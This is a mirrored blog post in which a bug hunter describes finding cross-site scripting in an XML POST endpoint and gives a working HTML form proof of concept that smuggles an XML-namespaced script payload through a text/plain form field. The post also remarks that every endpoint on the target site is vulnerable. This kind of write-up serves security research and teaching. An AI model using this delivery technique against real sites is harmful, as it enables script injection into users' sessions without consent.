zoukankan      html  css  js  c++  java
  • XSS via XML POST

    I was bug hunting on a site which looked like this: 

    POST /snip/snippet.php HTTP/1.1 
    <?xml version="1.0"?> 


    I tested in BURP for XSS in XML, and it worked. Now I have to get this to work via a browser. I was a bit stuck of sending XML in a HTML form POST and google didn’t yeild me any results, but I worked out how. Below is my PoC: 

    <html> <body> <form ENCTYPE="text/plain" action="http://vulnsite.com/snip/snippet.php" method="post"> <input type="hidden" name="<foo> <html xmlns:html='http://www.w3.org/1999/xhtml'> <html:script>alert(1);</html:script> </html> </foo>"> <input type="submit" value="submit"> </form> 

    Upon pressing “Submit”, the XSS in the XML is sent, and executes. And there we have it.. XSS in a XML post via a HTML form. Turns out adding the input name as the XSS will allow it to be executed. 

    Note: Turns out all endpoints on the target site are vulnerable to this.. they’re going to have fun patching this. ;)
  • 相关阅读:
    Codeforces 959 E Mahmoud and Ehab and the xor-MST
    LightOj 1336 Sigma Function
    某考试 T1 sigfib
    [BOI2007] Sequence
    UOJ 41. 矩阵变换
    [BOI2007] Mokia
    SPOJ 26108 TRENDGCD
    bzoj3545: [ONTAK2010]Peaks
    bzoj3910: 火车
    bzoj1185: [HNOI2007]最小矩形覆盖
  • 原文地址:https://www.cnblogs.com/hackforfun/p/5894499.html
Copyright © 2011-2022 走看看